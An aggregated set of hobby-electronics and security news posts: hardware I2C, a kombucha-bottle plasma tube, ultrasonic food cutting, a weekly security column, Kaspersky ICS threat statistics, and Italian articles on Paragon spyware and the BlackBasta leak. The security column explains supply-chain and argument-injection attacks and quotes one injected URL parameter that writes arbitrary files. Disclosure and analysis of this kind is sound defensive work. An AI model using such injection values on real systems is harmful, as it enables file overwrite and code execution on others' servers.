Moving Software Down to Hardware
In theory, any piece of software could be built out of discrete pieces of hardware, provided there are enough transistors, passive components, and time available. In general, though, we’re much more likely to reach for a programmable computer or microcontroller for all but the simplest tasks for several reasons: cost, effort, complexity, economics, and sanity. [Igor Brichkov] was working with I2C and decided that he wanted to see just where this line between hardware and software should be by implementing this protocol itself directly with hardware.
One of the keys to “programming” a communications protocol in hardware is getting the timing right, the first part of which is initializing communications between this device and another on the bus. [Igor] is going to be building up the signal in parts and then ORing them together. The first part is a start condition, generated by one oscillator and a counter. This also creates a pause, at which point a second oscillator takes over and sends data out. The first data needed for I2C is an address, which is done with a shift register and a counter pre-set to send the correct bits out on the communications lines.
To build up the rest of the signal, including data from the rotary encoder [Igor] is using for his project, essentially sets of shift registers and counters are paired together to pass data out through the I2C communications lines in sequence. It could be thought of that the main loop of the hardware program is a counter, which steps through all the functions sequentially, sending out data from the shift registers one by one. We saw a similar project over a decade ago, but rather than automating the task of sending data on I2C it allowed the user to key in data manually instead.
youtube.com/embed/_pVlHPgud7I?…
Turning a Kombucha Bottle Into a Plasma Tube
Kombucha! It’s a delicious fermented beverage that is kind to your digestive system and often sold in glass bottles. You don’t just have to use those bottles for healthy drinks, though. As [Simranjit Singh] demonstrates, you can also use them to create your very own plasma tube.
[Simranjit’s] build begins with a nice large 1.4-liter kombucha bottle from the Synergy brand. To make the plasma tube nicely symmetrical, the bottle had its original spout cut off cleanly with a hot wire, with the end then sealed with a glass cap. Electrodes were installed in each end of the tube by carefully drilling out the glass and installing small bolts. They were sealed in place with epoxy laced with aluminium oxide in order to improve the dielectric strength and aid the performance of the chamber. A vacuum chamber was then used to evacuate air from inside the chamber. Once built, [Simranjit] tested the bottle with high voltage supplied from a flyback transformer, with long purple arcs flowing freely through the chamber.
A plasma tube may not be particularly useful beyond educational purposes, but it does look very cool. We do enjoy a nice high-voltage project around these parts, after all.
youtube.com/embed/eNmOGAE5OCU?…
Building a Handheld Pong Game
Pong was one of the first video games to really enter the public consciousness. While it hasn’t had the staying power of franchises like Zelda or Call of Duty, it nonetheless still resonates with gamers today. That includes [Arnov Sharma], who put together this neat handheld version using modern components.
An ESP32 development board serves as the brains of the operation. Capable of operating at many hundreds of megahertz, it has an excessive amount of power for an application as simple as this. Nonetheless, it’s cheap, and it gets the job done. It’s paired with an SSD1306 OLED screen of 124 x 32 resolution. That might not sound like much, but it’s plenty when you’re just drawing two paddles and a ball bouncing between them. Control is via a pair of SMD push buttons for a nice responsive feel.
What’s really neat, though, is the presentation. [Arnov] wrapped the electronics in a neat bean-shaped housing that vaguely apes game controllers of the 16-bit era. Indeed, [Arnov] explains that it was inspired by the Sega Genesis specifically. It looks great with the black PCBs integrated so nicely with the bright orange 3D printed components, and looks quite comfortable to use, too.
It might be a simple project, but it’s done rather well. Just by thinking about color choices and how to assemble the base components, [Arnov] was able to create an attractive and functional game that’s a lot more eye catching than some random boards thrown in an old project box. Indeed, we’ve featured stories on advanced FR4/PCB construction techniques before, too. Meanwhile, if you’re creating your own projects with similar techniques, don’t hesitate to let us know!
High Frequency Food: Better Cutting With Ultrasonics
You’re cutting yourself a single slice of cake. You grab a butter knife out of the drawer, hack off a moist wedge, and munch away to your mouth’s delight. The next day, you’re cutting forty slices of cake for the whole office. You grab a large chef’s knife, warm it with hot water, and cube out the sheet cake without causing too much trauma to the icing. Next week, you’re starting at your cousin’s bakery. You’re supposed to cut a few thousand slices of cake, week in, week out. You suspect your haggardly knifework won’t do.
In the home kitchen, any old knife will do the job when it comes to slicing cakes, pies, and pastries. When it comes to commercial kitchens, though, presentation is everything and perfection is the bare minimum. Thankfully, there’s a better grade of cutting tool out there—and it’s more high tech than you might think.
Shake It
Knives are very good at cutting food into distinct separate pieces. However, they have one major problem—food is sticky, and so are they. If you’ve ever cut through a cheesecake, you’ve seen this in action. Unless you’re very careful and deft with your slicing, the cake tends to grip the blade of the knife as it comes through. Try as you might, you’re almost always going to leave some marred edges unless you work very slowly.
While most home chefs and cafes can turn a blind eye to these sorts of things, that’s not the case in the processed food industry. For one thing, consumers expect each individually-packed morsel of food to be as cosmetically perfect as the last. For another, cutting processes have to be robust to work at speed. A human can compensate as they cut, freeing the blade from sticking and fettling the final product to hide their mistakes. Contrast that to a production line that slices ice cream bars from a sheet all day. All it takes is one stuck piece to completely mess up the production line and ruin the product.
youtube.com/embed/G_hPMZ2aNXQ?…
This is where ultrasonic food processing comes in. Ultrasonic cutting blades exist for one primary reason—they enable the cutting of all kinds of different foods without sticking, squashing, or otherwise marring the food. These blades most commonly find themselves used in processed food production lines, where a bulk material must be cut into individual bars or slices for later preparation or packaging.
It’s quite something to watch these blades in action. Companies like Dukane and MeiShun have demo videos that show the uncanny ability of their products to slice through even the stickiest foods without issue. You can watch cheesecakes get evenly sectored into perfect triangular slices, or a soft brie cheese being sliced without any material being left on the blade. The technique works on drier materials too—it’s possible to cut perfectly nice slices of bread with less squishing and distortion using ultrasonic blades. Even complex cakes, like the vanilla slice, with layers of stiff pastry and smooth custard, can be cut into neat polygons with appropriate ultrasonic tooling.
youtube.com/embed/0cwpbKnfO2Y?…
youtube.com/embed/xaM2N-DGCys?…
The mechanism of action is well-understood. An ultrasonic cutting blade is formally known as a sonotrode, and is still sharpened to an edge to do its job. However, where it varies from a regular blade is that it does not use mere pressure to slice through the target material. Instead, transducers in the sonotrode vibrate it at an ultrasonic frequency—beyond the range of human hearing, typically from 20 kHz to 40 kHz. When the sonotrode comes into contact with the material, the high-frequency vibrations allow it to slice through the material without sticking to it. Since the entire blade is vibrating, it continues to not stick as it slides downwards, allowing for an exceptionally clean cut.
Generally, the ultrasonic sonotrode is paired with a motion platform to move the food precisely through the cutting process, and an actuator to perform the cutting action itself. However, there are also handheld ultrasonic knives that can be purchased for those looking to use the same technique manually.
The technique isn’t solely applied to the food industry. The same techniques work for many other difficult-to-cut materials, like rubber. The technique can also be applied to various textiles or plastic materials, too. In some cases, the sonotrode can generate enough heat as it cuts through the materials to melt and seal the edges of the material it’s cutting through.
youtube.com/embed/0CesZLfD5fU?…
If you’re simply looking to cut some cake at home, this technique might be a little overly advanced for you. At the same time, there’s nothing stopping you from rigging up some transducers with a blade and a DIY CNC platform seeing what you can achieve. If you want the most perfectly cubed sheet cake at your next office party, this might just be the technology you’re looking for.
Hackaday Podcast Episode 313: Capacitor Plague, Wireless Power, and Tiny Everything
We’re firmly in Europe this week on the Hackaday podcast, as Elliot Williams and Jenny List are freshly returned from Berlin and Hackaday Europe. A few days of mingling with the Hackaday community, going through mild panic over badges and SAOs, and enjoying the unique atmosphere of that city.
After discussing the weekend’s festivities we dive right into the hacks, touching on the coolest of thermal cameras, wildly inefficient but very entertaining wireless power transfer, and a restrospective on the capacitor plague from the early 2000s. Was it industrial espionage gone wrong, or something else? We also take a moment to consider spring PCB cnnectors, as used by both one of the Hackaday Europe SAOs, and a rather neat PCB resistance decade box, before looking at a tryly astounding PCB blinky that sets a new miniaturisation standard.
In our quick roundup the standouts are a 1970s British kit synthesiser and an emulated 6502 system written in shell script, and in the can’t-miss section we look at a new contender fro the smallest microcontroller, and the posibility that a century of waste coal ash may conceal a fortune in rare earth elements.
Follow the link below, to listen along!
html5-player.libsyn.com/embed/…
Want the podcast in MP3? Get it in MP3!
Where to Follow Hackaday Podcast
Places to follow Hackaday podcasts:
Episode 312 Show Notes:
What’s that Sound?
- If you know what that sound was, and we think you probably do, put your name down here to be in the drawing for the t-shirt.
Interesting Hacks of the Week:
- The Capacitor Plague Of The Early 2000s
- Make Your Cheap Thermal Camera Into A Microscope
- Transmitting Wireless Power Over Longer Distances
- A Decade Resistance Box From PCBs
- World’s Smallest Blinky, Now Even Smaller
- Writing A GPS Receiver From Scratch
Quick Hacks:
- Elliot’s Picks:
- Reviving A Maplin 4600 DIY Synthesizer From The 1970s
- Make Fancy Resin Printer 3D Models FDM-Friendly
- Chemistry Meets Mechatronics In This Engaging Art Piece
- Current Mirrors Tame Common Mode Noise
- Speeding Up Your Projects With Direct Memory Access
- Jenny’s Picks:
- Pick Up A Pebble Again
- Turning Down The Noise On SMPS
- A 6502, In The Shell
- Repairing A Kodak Picture Maker Kiosk
Can’t-Miss Articles:
- Ask Hackaday: What Would You Do With The World’s Smallest Microcontroller?
- From The Ashes: Coal Ash May Offer Rich Source Of Rare Earth Elements
hackaday.com/2025/03/21/hackad…
Benchtop Haber-Bosch Makes Ammonia at Home
Humans weren’t the first organisms on this planet to figure out how to turn the abundance of nitrogen in the atmosphere into a chemically useful form; that honor goes to some microbes that learned how to make the most of the primordial soup they called home. But to our credit, once [Messrs. Haber and Bosch] figured out how to make ammonia from thin air, we really went gangbusters on it, to the tune of 8 million tons per year of the stuff.
While it’s not likely that [benchtop take on the Haber-Bosch process demonstrated by [Marb’s lab] will turn out more than the barest fraction of that, it’s still pretty cool to see the ammonia-making process executed in such an up close and personal way. The industrial version of Haber-Bosch uses heat, pressure, and catalysts to overcome the objections of diatomic nitrogen to splitting apart and forming NH3; [Marb]’s version does much the same, albeit at tamer pressures.
[Marb]’s process starts with hydrogen made by dripping sulfuric acid onto zinc strips and drying it through a bed of silica gel. The dried hydrogen then makes its way into a quartz glass reaction tube, which is heated by a modified camp stove. Directly above the flame is a ceramic boat filled with catalyst, which is a mixture of aluminum oxide and iron powder; does that sound like the recipe for thermite to anyone else?
A vial of Berthelot’s reagent, which [Marb] used in his recent blood ammonia assay, indicates when ammonia is produced. To start a run, [Marb] first purges the apparatus with nitrogen, to prevent any hydrogen-related catastrophes. After starting the hydrogen generator and flaring off the excess, he heats up the catalyst bed and starts pushing pure nitrogen through the chamber. In short order the Berthelot reagent starts turning dark blue, indicating the production of ammonia.
It’s a great demonstration of the process, but what we like about it is the fantastic tips about building lab apparatus on the cheap. Particularly the idea of using hardware store pipe clamps to secure glassware; the mold-it-yourself silicone stoppers were cool too.
youtube.com/embed/31jpvFuUQBI?…
This Week in Security: The Github Supply Chain Attack, Ransomware Decryption, and Paragon
Last Friday Github saw a supply chain attack hidden in a popular Github Action. To understand this, we have to quickly cover Continuous Integration (CI) and Github Actions. CI essentially means automatic builds of a project. Time to make a release? CI run. A commit was pushed? CI run. For some projects, even pull requests trigger a CI run. It’s particularly handy when the project has a test suite that can be run inside the CI process.
Doing automated builds may sound straightforward, but the process includes checking out code, installing build dependencies, doing a build, determining if the build succeeded, and then uploading the results somewhere useful. Sometimes this even includes making commits to the repo itself, to increment a version number for instance. For each step there are different approaches and interesting quirks for every project. Github handles this by maintaining a marketplace of “actions”, many of which are community maintained. Those are reusable code snippets that handle many CI processes with just a few options.
One other element to understand is “secrets”. If a project release process ends with uploading to an AWS store, the process needs an access key. Github stores those secrets securely, and makes them available in Github Actions. Between the ability to make changes to the project itself, and the potential for leaking secrets, it suddenly becomes clear why it’s very important not to let untrusted code run inside the context of a Github Action.
And this brings us to what happened last Friday. One of those community maintained actions, tj-actions/changed-files, was modified to pull an obfuscated Python script and run it. That code dumps the memory of the Github runner process, looks for anything there tagged with isSecret, and writes those values out to the log. The log, that coincidentally, is world readable for public repositories, so printing secrets to the log exposes them for anyone that knows where to look.
Researchers at StepSecurity have been covering this, and have a simple search string to use: org:changeme tj-actions/changed-files Action. That just looks for any mention of the compromised action. It’s unclear whether the compromised action was embedded in any other popular actions. The recommendation is to search recent Github Action logs for any mention of changed-files, and start rotating secrets if present.
Linux Supply Chain Research
The folks at Fenrisk were also thinking about supply chain attacks recently, but specifically in how Linux distributions are packaged. They did find a quartet of issues in Fedora’s Pagure web application, which is used for source code management for Fedora packages. The most severe of them is an argument injection in the logging function, allowing for arbitrary file write.
The identifier option is intended to set the branchname for a request, but it can be hijacked in a request, injecting the output flag: [url=http://pagure.local/test/history/README.md?identifier=--output=/tmp/foo.bar]http://pagure.local/test/history/README.md?identifier=--output=/tmp/foo.bar[/url]. That bit of redirection will output the Git history to the file specified. Git history consists of a git hash, and then the short commit message. That commit message has very little in the way of character scrubbing, so Bash booleans like || can be used to smuggle a command in. Add the cooked commit to your local branch of something, query the URL to write the file history to your .bashrc file, and then attempt to SSH in to the Pagure service. The server does the right thing with the SSH connection, refusing to give the user a shell, but not before executing the code dropped into the .bashrc file. This one was disclosed in April 2024, and was fixed within hours of disclosure by Red Hat.
Pagure was not the only target, and Fenrisk researchers also discovered a critical vulnerability in OpenSUSE’s Open Build Service. It’s actually similar to the Fedora Pagure issue. Command options can be injected into the wget command used to download the package source file. The --output-document argument can be used to write arbitrary data to a file in the user’s home directory, but there isn’t an obvious path to executing that file. There are likely several ways this could be accomplished, but the one chosen for this Proof of Concept (PoC) was writing a .proverc file in the home directory. Then a second wget argument is injected, using --use-askpass to trigger the prove binary. It loads from the local rc file, and we have arbitrary shell code execution. The OpenSUSE team had fixes available and rolled out within a few days of the private disclosure back in June of 2024.
Breaking Ransomware Encryption
What do you do when company data is hit with Akira ransomware, and the backups were found wanting? If you’re [Yohanes Nugroho], apparently you roll up your sleeves and get to work. This particular strain of Akira has a weakness that made decryption and recovery seemingly easy. The encryption key was seeded by the current system time, and [Yohanes] had both system logs and file modification timestamps to work with. That’s the danger of using timestamps for random seeds. If you know the timestamp, the pseudorandom sequence can be derived.
It turns out, it wasn’t quite that easy. This strain of Akira actually used four separate nanosecond scale time values in determining the per-file encryption key. Values we’ll call t3 and t4 are used to seed the encryption used for the first eight bytes of each file. If there’s any hope of decrypting these files, those two values will have to be found first. Through decompiling the malware binaries, [Yohanes] knew that the malware process would start execution, then run a fixed amount of code to generate the t3 key, and a fixed amount of code before generating the t4 key. In an ideal world, that fixed code would take a fixed amount of time to run, but multi-core machines, running multi-threaded operations on real hardware will introduce variations in that timing.
The real-world result is a range of possible time offsets for both those values. Each timestamp from the log results in about 4.5 quadrillion timestamp pairs. Because the timing is more known, once t3 and t4 are discovered, finding t1 and t2 is much quicker. There are some fun optimizations that can be done, like generating a timestamp to pseudorandom value lookup table. It works well ported to CUDA, running on an RTX 4090. In the end, brute-forcing a 10 second slice of timestamps cost about $1300 dollars when renting GPUs through a service like vast.ai. The source code that made this possible isn’t pretty, but [Yohanes] has made it all available if you want to attempt the same trick.
Github and Ruby-SAML — The Rest of the Story
Last week we briefly talked about Github’s discovery of the multiple parser problem in Ruby-SAML, leading to authentication bypass. Researchers at Portswigger were also working on this vulnerability, and have their report out with more details. One of those details is that while Github had already moved away from using this library, Gitlab Enterprise had not. This was a real vulnerability on Gitlab installs, and if your install is old enough, maybe it still is.
The key here is a CDATA section wrapped in an XML comment section is only seen by one of the parsers. Include two separate assertion blocks, and you get to drive right through the difference between the two parsers.
Paragon
There’s a new player in the realm of legal malware. Paragon has reportedly targeted about 90 WhatsApp users with a zero-click exploit, using a malicious PDF attachment to compromise Android devices. WhatsApp has mitigated this particular vulnerability on the server side.
It’s interesting that apparently there’s something about the process of adding the target user to the WhatsApp group that was important to making the attack work. Paragon shares some similarities with NSO Group, but maintains that it’s being more careful about who those services are being offered to.
Bits and Bytes
We have a pair of local privilege escalation attacks. This is useful when an attacker has unprivileged access to a machine, but can use already installed software to get further access. The first is Google’s Web Designer, that starts a debug port, and exposes an account token and file read/right to the local system. The other is missing quotation marks in Plantronics Hub, which leads to the application attempting to execute C:\Program.exe before it descends into Program Files to look for the proper location.
This is your reminder, from Domain Guard, to clean up your DNS records. I’ve now gone through multiple IP address changes of my “static” IP Addresses. At the current rate of IPv4 exhaustion, those IPs are essentially guaranteed to be given out to somebody else. Is it a problem to have dangling DNS records? It’s definitely not a good situation, because it enables hacks from cross-site scripting vulnerabilities, to cookie stealing, to potentially defeating domain verification schemes with the errant subdomain.
MacOS has quite a fine history of null-pointer dereference vulnerabilities. That’s when a pointer is still set to NULL, or 0, and the program errantly tries to access that memory location. It used to be that a clever attacker could actually claim memory location 0, and take advantage of the bogus dereference. But MacOS put an end to that technique in a couple different ways, the most effective being disallowing 32 bit processes altogether in recent releases. It seems that arbitrary code execution on MacOS as result of a NULL Pointer Dereference is a thing of the past. And yes, we’re quite aware that this statement means that somehow, someone will figure out a way to make it happen.
And Finally, watchTowr is back with their delightful blend of humor and security research. This time it’s a chain of vulnerabilities leading to an RCE in Kentico, a proprietary web Content Management System. This vulnerability has one of my least favorite data formats, SOAP XML. It turns out Kentico’s user authentication returns an empty string instead of a password hash when dealing with an invalid username. And that means you can craft a SOAP authenticaiton token with nothing more than a valid nonce and timestamp. Whoops. The issue was fixed in a mere six days, so good on Kentico for that.
Aluminum Business Cards Make Viable PCB Stencils
[Mikey Sklar] had a problem—namely, running low on the brass material typically used for making PCB stencils. Thankfully, a replacement material was not hard to find. It turns out you can use aluminum business card blanks to make viable PCB stencils.
Why business card blanks? They’re cheap, for a start—maybe 15 cents each in quantity. They’re also the right thickness, at just 0.8 mm, and they’re flat, unlike rolled materials that can tend to flip up when you’re trying to spread paste. They’re only good for small PCBs, of course, but for many applications, they’ll do just fine.
To cut these, you’ll probably want a laser cutter. [Mikey] was duly equipped in that regard already, which helped. Using a 20 watt fiber laser at a power of 80%, he was able to get nice accurate cuts for the stencils. Thanks to the small size of the PCBs in question, the stencils for three PCBs could be crammed on to a single card.
If you’re not happy with your existing PCB stencil material, you might like to try these aluminium blanks on for size. We’ve covered other stenciling topics before, too.
youtube.com/embed/vPO3uMIyp_U?…
Threat landscape for industrial automation systems in Q4 2024
Statistics across all threats
In Q4 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.1 pp from the previous quarter to 21.9%.
Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022–2024
Compared to Q4 2023, the percentage decreased by 2.8 pp.
The percentage of ICS computers on which malicious objects were blocked during Q4 2024 was highest in October and lowest in November. In fact, the percentage in November 2024 was the lowest of any month in two years.
Percentage of ICS computers on which malicious objects were blocked, Jan 2023–Dec 2024
Region rankings
Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 10.6% in Northern Europe to 31% in Africa.
Regions ranked by percentage of ICS computers where malicious objects were blocked, Q3 2024
Eight of 13 regions saw their percentages increase from the previous quarter.
Regions and world. Changes in the percentage of attacked ICS computers in Q4 2024
Selected industries
The biometrics sector led the surveyed industries in terms of the percentage of ICS computers on which malicious objects were blocked.
Percentage of ICS computers on which malicious objects were blocked in selected industries
In Q4 2024, the percentage of ICS computers on which malicious objects were blocked decreased across most industries, with the exception of the construction sector.
Changes in the percentage of ICS computers on which malicious objects were blocked in selected industries
Diversity of detected malicious objects
In Q4 2024, Kaspersky’s protection solutions blocked malware from 11,065 different malware families of various categories on industrial automation systems.
Percentage of ICS computers on which the activity of malicious objects from various categories was blocked
Main threat sources
The internet, email clients and removable storage devices remain the primary sources of threats to computers in an organization’s technology infrastructure. Note that the sources of blocked threats cannot be reliably identified in all cases.
In Q4 2024, the percentage of ICS computers on which threats from various sources were blocked decreased for all threat sources described in this report. Moreover, all indicators recorded their lowest values for the observed period.
Percentage of ICS computers on which malicious objects from various sources were blocked
Threat categories
Malicious objects used for initial infection
Malicious objects used for initial infection of ICS computers include dangerous internet resources that are added to denylists, malicious scripts and phishing pages, and malicious documents.
In the fourth quarter of 2024, the percentage of ICS computers on which malicious documents and denylisted internet resources were blocked decreased to 1.71% (by 0.26 pp) and 5.52% (by 1.32 pp), respectively and reached its lowest level since the beginning of 2022.
As noted in the Q3 2024 report, the increase in blocked denylisted internet resources was primarily driven by an increase in the number of newly created domain names and IP addresses used by cybercriminals as command-and-control (C2) infrastructure for distributing malware and phishing attacks.
The decline in the percentage of denylisted internet resources in November–December 2024 was likely influenced not only by proactive threat mitigation measures at various levels – from resource owners and hosting providers to ISPs and law enforcement agencies. Another contributing factor was the tendency of attackers to frequently change domains and IP addresses to evade detection in the initial stages, based on lists of known malicious resources.
In practice, this means that until a malicious web resource is identified and added to a denylist, it may not immediately appear in threat statistics, leading to an apparent decrease in the percentage of ICS computers on which such resources were blocked.
However, in Q4, we also saw a rise in the percentage of the next steps in the attack chain – malicious scripts and phishing pages (7.11%), spyware (4.30%), and ransomware (0.21%).
A significant increase in the percentage of malicious scripts and phishing pages in October was driven by a series of widespread phishing attacks in late summer and early fall 2024, as mentioned in the Q3 2024 report. Threat actors used malicious scripts that executed in the browser, mimicking various windows with CAPTCHA-like interfaces, browser error messages and similar pop-ups to trigger the download of next-stage malware: either the Lumma stealer or the Amadey Trojan.
Next-stage malware
Malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers. As a rule, the higher the percentage of ICS computers on which the initial infection malware is blocked, the higher the percentage for next-stage malware.
The percentage of ICS computers on which spyware (spy Trojans, backdoors and keyloggers) was blocked increased by 0.39 pp from the previous quarter to 4.30%.
The percentage of ICS computers on which ransomware was blocked increased by a factor of 1.3 compared to the previous quarter, reaching 0.21%, its highest value in two years.
The percentage of ICS computers on which miners in the form of executable files for Windows were blocked decreased by 0.01 pp to 0.70%.
And, the percentage of ICS computers on which web miners were blocked decreased by 0.02 pp to 0.39%, reaching its lowest value in the observed period.
Self-propagating malware
Self-propagating malware (worms and viruses) is a category unto itself. Worms and virus-infected files were originally used for initial infection, but as botnet functionality evolved, they took on next-stage characteristics. To spread across ICS networks, viruses and worms rely on removable media, network folders, infected files including backups, and network attacks on outdated software.
In Q4 2024, the percentage of ICS computers on which worms were blocked increased by 0.07 pp and reached 1,37%. The rate of viruses increased by 0.08 pp to 1.61%.
AutoCAD malware
AutoCAD malware is typically a low-level threat, coming last in the malware category rankings in terms of the percentage of ICS computers on which it was blocked.
In Q4 2024, the percentage of ICS computers on which AutoCAD malware was blocked continued to decrease by losing 0.02 pp and reached 0.38%.
You can find the full Q3 2024 report on the Kaspersky ICS CERT website.
securelist.com/ics-cert-q4-202…
Cheap Endoscopic Camera Helps Automate Pressure Advance Calibration
The difference between 3D printing and good 3D printing comes down to attention to detail. There are so many settings and so many variables, each of which seems to impact the other to a degree that can make setting things up a maddening process. That makes anything that simplifies the process, such as this computer vision pressure advance attachment, a welcome addition to the printing toolchain.
If you haven’t run into the term “pressure advance” for FDM printing before, fear not; it’s pretty intuitive. It’s just a way to compensate for the elasticity of the molten plastic column in the extruder, which can cause variations in the amount of material deposited when the print head acceleration changes, such as at corners or when starting a new layer.
To automate his pressure advance calibration process, [Marius Wachtler] attached one of those dirt-cheap endoscope cameras to the print head of his modified Ender 3, pointing straight down and square with the bed. A test grid is printed in a corner of the bed, with each arm printed using a slightly different pressure advance setting. The camera takes a photo of the pattern, which is processed by computer vision to remove the background and measure the thickness of each line. The line with the least variation wins, and the pressure advance setting used to print that line is used for the rest of the print — no blubs, no blebs.
We’ve seen other pressure-advanced calibrators before, but we like this one because it seems so cheap and easy to put together. True, it does mean sending images off to the cloud for analysis, but that seems a small price to pay for the convenience. And [Marius] is hopeful that he’ll be able to run the model locally at some point; we’re looking forward to that.
youtube.com/embed/LptiyxAR9nc?…
Cucù, Lo 0day di Graphite non c’è più! Whatsapp risolve il bug usato per colpire gli italiani
Ne avevamo discusso di recente, analizzando il caso Paragon in Italia, che ha portato alla sorveglianza di diversi cittadini italiani. Uno scandalo che, come spesso accade, ha sollevato polemiche per poi finire rapidamente nel dimenticatoio.
WhatsApp ha corretto una vulnerabilità zero-day sfruttata per installare lo spyware Graphite di Paragon. Lo Sviluppatore di spyware israeliano Paragon Solutions Ltd. è stata fondata nel 2019. Secondo quanto riportato dai media, nel dicembre 2024 la società è stata acquisita dal gruppo di investimento AE Industrial Partners con sede in Florida.
A differenza dei suoi concorrenti (come NSO Group), Paragon afferma di vendere i suoi strumenti di sorveglianza solo alle forze dell’ordine e alle agenzie di intelligence dei paesi democratici che hanno bisogno di rintracciare criminali pericolosi. Il 31 gennaio 2025, dopo aver risolto la vulnerabilità zero-click, i rappresentanti di WhatsApp hanno notificato a circa 90 utenti Android di 20 Paesi (tra cui giornalisti e attivisti italiani) di essere stati vittime di attacchi da parte dello spyware Paragon, progettato per raccogliere dati sensibili e intercettare i loro messaggi privati.
Come hanno ora rivelato gli esperti di Citizen Lab , gli aggressori hanno aggiunto le future vittime ai gruppi WhatsApp e poi hanno inviato loro un file PDF. Il dispositivo della vittima ha elaborato il file dando accesso all’exploit 0-day che ha consentito l’installazione dello spyware Graphite.
Successivamente il malware è fuoriuscito dalla sandbox di Android e ha compromesso altre app sui dispositivi delle vittime. Inoltre, dopo l’installazione, lo spyware forniva ai suoi operatori l’accesso ai messaggi di messaggistica degli utenti. A quanto si dice, lo spyware può essere rilevato sui dispositivi Android con jailbreak tramite un artefatto denominato BIGPRETZEL. È possibile scoprirlo analizzando i registri dei dispositivi hackerati.
Gli esperti di Citizen Lab hanno mappato l’infrastruttura server utilizzata da Paragon per installare Graphite sui dispositivi delle vittime e hanno trovato possibili collegamenti tra l’azienda e diversi clienti governativi, tra cui Australia, Canada, Cipro, Danimarca, Israele e Singapore. In totale, sono stati in grado di identificare 150 certificati digitali associati a decine di indirizzi IP che, secondo i ricercatori, fanno parte dell’infrastruttura di controllo di Paragon.
“L’infrastruttura includeva server cloud che erano probabilmente stati affittati da Paragon o dai suoi clienti, così come server che potrebbero essere stati ubicati nei locali di Paragon e dei suoi clienti governativi. L’infrastruttura scoperta era collegata a pagine web chiamate “Paragon” che venivano restituite da indirizzi IP in Israele (dove ha sede Paragon), nonché a un certificato TLS contenente il nome dell’organizzazione Graphite. Lo stesso nome è dato allo spyware Paragon. È stato trovato anche un nome comune “installerserver”. Il prodotto spyware concorrente Pegasus usa il termine “Installation Server” per riferirsi ai server progettati per infettare i dispositivi con spyware”, scrivono gli esperti.
Secondo i rappresentanti di WhatsApp, questo vettore di attacco è stato risolto alla fine del 2024 e non ha richiesto patch lato client. L’azienda ha affermato di aver deciso di non assegnare un identificatore CVE alla vulnerabilità dopo “aver esaminato le linee guida CVE pubblicate da MITRE e a causa delle politiche interne dell’azienda”.
L'articolo Cucù, Lo 0day di Graphite non c’è più! Whatsapp risolve il bug usato per colpire gli italiani proviene da il blog della sicurezza informatica.
Il Dossier Segreto su BlackBasta : Cosa imparare dei retroscena inediti di una Ransomware Gang
Nel libro “l’arte della Guerra” Sun Tzu scrisse “Se conosci il nemico e te stesso, la tua vittoria è sicura“.
Conoscere il nemico è un aspetto fondamentale di qualunque campo di battaglia, compreso quello della sicurezza informatica. Per questo motivo il lavoro di DarkLab, appena pubblicato per Red Hot Cyber, ha una rilevanza senza pari.
Cosa è accaduto: qualche tempo si è realizzato un data leak che ha visto la pubblicazione di moltissime chat e comunicazioni intercorse tra gli affiliati ad una temutissima gang di criminali informatici, specializzata in ransomware. DarkLab ha analizzato questi documenti e ne ha ricavato un dossier (di facile e veloce lettura, che consiglio vivamente).
Questo report è importantissimo poiché ci consente di vedere cosa e come funziona “dall’altra parte”, traendone informazioni utili che qualunque ente e azienda potrebbero convertire in misure di sicurezza. Qui mi interessa evidenziarne alcune, per il resto (struttura, tattiche di negoziazione dei riscatti, ecc…) vi consiglio vivamente di leggere il rapporto che trovate qui
Le VPN sono bersagli particolarmente attenzionati dai criminali informatici, i quali destinano investimenti mirati per lo sfruttamento delle loro vulnerabilità.
Insegnamento: prestare particolare attenzione e investire particolarmente sulla protezione delle VPN
Tecniche di social Engineering avanzate: la gang ha un operatore dedicato, specializzato nel contatto di personale chiave nelle aziende vittime. Una delle tecniche sviluppate è quella di impersonificare un operatore del dipartimento IT per ottenere accesso ai sistemi delle vittime, anche attraverso call center per rendere tutto più credibile.
Insegnamento: redigere delle politiche ad hoc per i contatti dell’ufficio IT con il personale aziendale, e fare in modo che ne siano tutti informati, in modo tale da non dare seguito a richieste effettuate in maniera non proceduralizzata.
per evitare la detection agiscono con molta calma, fino ad arrivare a lanciare solo un comando al giorno. Inoltre, hanno fatto ricorso ad una mail fingendosi il supporto tecnico interno al fine di mascherare talune operazioni.
Insegnamento: ancora una volta emerge come l’impersonificazione del reparto IT sia un vettore chiave per molti attacchi. Proceduralizzare delle modalità di contatto dei servizi IT, da mantenere riservate, costituisce una importante contromisura.
I criminali informatici cercano di evitare attacchi a realtà che implementano la MFA.
Insegnamento: MFA è uno strumento che può essere un forte disincentivo all’attacco criminale.
Una tecnica molto utilizzata era il phishing mediante Microsoft Teams con un “pretext” standard.
Insegnamento: sviluppare politiche interne per qualunque tipo di comunicazione. Queste politiche sono da mantenere riservate e conosciute solo al personale a cui è fatto divieto di diffonderle. Insegnare a riconoscere i messaggi di phishing all’interno dell’azienda elimina uno strumento di attacco ai criminali.
Tutte queste informazioni sono preziosissime per chi si deve difendere, poiché consente di conoscere le metodologie di attacco e di adottare le contromisure più opportune e adeguate.
Conoscere il proprio nemico è fondamentale, ma altrettanto importante è conoscere se stessi, e forse è da questo punto che molte realtà dovrebbero iniziare poiché troppo spesso c’è poca consapevolezza.
L'articolo Il Dossier Segreto su BlackBasta : Cosa imparare dei retroscena inediti di una Ransomware Gang proviene da il blog della sicurezza informatica.
A Modern Take on the Etch A Sketch
The Etch A Sketch is a classic children’s toy resembling a picture frame where artwork can be made by turning two knobs attached to a stylus inside the frame. The stylus scrapes off an aluminum powder, creating the image which can then be erased by turning the frame upside down and shaking it, adding the powder back to the display. It’s completely offline and requires no batteries, but in our modern world those two things seem to be more requirements than when the Etch A Sketch was first produced in the 1960s. Enter the Tilt-A-Sketch, a modern version of the classic toy.
Rather than use aluminum powder for the display, the Tilt A Sketch replaces it with an LED matrix and removes the stylus completely. There are no knobs on this device to control the path of the LED either; a inertial measurement unit is able to sense the direction that the toy is tilted while a microcontroller uses that input to light up a series of LEDs corresponding to the direction of tilt. There are a few buttons on the side of the device as well which allow the colors displayed by the LEDs to change, and similar to the original toy the display can be reset by shaking.
